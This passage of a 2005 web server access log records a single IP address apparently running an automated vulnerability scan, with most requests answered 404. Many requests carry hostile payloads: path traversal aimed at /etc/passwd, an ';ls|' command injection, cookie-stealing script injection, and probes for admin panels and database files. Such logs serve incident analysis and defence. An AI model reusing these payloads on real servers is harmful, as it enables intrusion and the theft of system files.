"-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/htmlscript HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/mojo/mojo.cgi? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /moregroupware/modules/webmail2/inc/ HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD%20 HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb HTTP/1.0" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /mrtg.cgi HTTP/1.0" 403 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /msadc/msadcs.dll HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /dcp/advertiser.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /shop/php_files/site.config.php%20 HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /filemgmt/singlefile.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /mambo/banners.php? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /database/db2000.mdb%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /mambo/pollBooth.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /convert-date.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /guestbook/pwd%20 HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /usercp.php HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/test-cgi HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /WEB-INF./web.xml HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:53 +0100] "GET /cgi-bin/whois.cgi HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /cgi-bin/formmail.cgi HTTP/1.0" 200 994 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /vgn/login? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /./../mpweb.ini HTTP/1.0" 400 270 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /PDG_Cart/order.log HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /index.php?SqlQuery=test%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /database/metacart.mdb%20 HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /myguestBk/add1.asp? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /myguestBk/admin/delEnt.asp?id=NEWSNUMBER HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /advwedadmin/adminsettings/browsedisk.asp?filepath=c:\\&Opt=3 HTTP/1.0" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /supporter/index.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /supporter/index.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /templates/form_header.php? HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /biztalktracking/rawdocdata.asp? HTTP/1.0" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /html/chatheader.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /poppassd.php3%20 HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:54 +0100] "GET /html/chatheader.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /admin/inc_add.asp%20 HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /myphpnuke/links.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /pt_config.inc HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /admin/index.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /room/save_item.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /modules/My_eGallery/public/displayCategory.php? HTTP/1.0" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/campas HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/nph-showlogs.pl? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/anyboard.cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/utm/utm_stat? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/utm/utm_stat? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /admin/modules/cache.php%20 HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /nw/article.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /dbabble? HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /nphp/nphpd.php? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /sample_showcode.html HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /docs/NED? HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /docs/NED? HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /docs/NED? HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /filemgmt/viewcat.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /cgi-bin/GW5/GWWEB.EXE HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:55 +0100] "GET /lcgi/lcgitest.nlm HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /scripts/convert.bas? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /guestbook/guestbookdat HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /IISSamples/ExAir/search.asp%20 HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /psynch/nph-psf.exe? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /perl/files.pl?file=vol2:apps/accounting/payroll.doc HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /scripts/iisadmin/ism.dll HTTP/1.0" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /cgi-winuploader.exe HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /cgi-bin/imagemap.exe HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /cgi-bin/statusconfig.pl HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /supporter/tupdate.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /cgi-bin/dose.pl? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /openautoclassifieds/friendmail.php? HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:56 +0100] "GET /index.php?tampon=test%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /cgi-bin/oj.cgi? HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /OpenTopic? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /myguestBk/admin/index.asp HTTP/1.0" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /advwedadmin/serv_u/servubrowse.asp?filepath=c:\\&Opt=3 HTTP/1.0" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /cgi-bin/rwcgi60/showenv HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /oscommerce/default.php HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /checkout_payment.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /html/partner.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /html/partner.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /admin/inc_pictures.asp%20 HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:57 +0100] "GET /product_info.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /doc/admin/index.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /catalog/inludes/include_once.php? HTTP/1.0" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /intranet/browse.php? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /genindexpage.cgi? HTTP/1.0" 403 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /pafiledb/pafiledb.php HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /thebox/admin.php? HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/utm/admin? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /servlets/SchedulerTransfer HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00%20 HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/phf HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /admin/fonctions/fctform.php%20 HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /board/philboard_admin.asp%20 HTTP/1.0" 404 220 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/guestbook.pl? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /phorum/admin/stats.php HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /downloads/pafiledb.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /downloads/pafiledb.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /downloads/pafiledb.php? HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /filemgmt/visit.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /nsn/env.bas HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /phpclassifieds/latestwap.php? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /cgi-bin/php.cgi HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /article.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /IISSamples/ExAir/query.asp%20 HTTP/1.0" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /images/?cwd=../../../../ HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /perl/files.pl?file=sys:etc/ldremote.ncf HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /index.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:58 +0100] "GET /topsitesdir/edit.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /php-coolfile/action.php? HTTP/1.0" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /viewpage.php?file=/etc/passwd%20 HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /admin.php? HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /modules.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /guestbook/admin/o12guest.mdb HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /search? HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /index.php?base=test%20 HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /nuke70/modules.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /modules/Forums/attachment.php HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /autohtml.php? HTTP/1.0" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /advwebadmin/stats/statsbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /cgi-bin/rwcgi60 HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /proplus/admin/login.php%20-d%20\"action=insert\"%20-d%20\"username=test\"%20-d%20\"password=test\" HTTP/1.0" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /phpbb206c/admin/admin_words.php? HTTP/1.0" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /forums/privmsg.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:22:59 +0100] "GET /db.php? HTTP/1.0" 404 200 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpBB/phpinfo.php HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /mlog.html HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /admin/inc_files.asp%20 HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /forum/mainfile.php? HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /owls/workshop/newmultiplechoice.php? HTTP/1.0" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpgedview/config_gedcom.php? HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpgedview/admin.php? HTTP/1.0" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpgedview/search.php? HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpix/index.phtml? HTTP/1.0" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpimageview.php?pw=show HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /addyoursite.php? HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /admin/fonctions/fctadmin.php%20 HTTP/1.0" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /phpmyadmin/export.php?what=../../../etc/services HTTP/1.0" 404 215 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /mysql/db_details_importdocsql.php? HTTP/1.0" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 206 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /compte.php? HTTP/1.0" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /functions.php?clang=../../../../../../../../../../../../etc/services%20 HTTP/1.0" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /modules.php? HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" 67.176.149.209 - - [05/Jul/2005:00:23:00 +0100] "GET /admin.php HTTP/1.0" 404 203 "-" 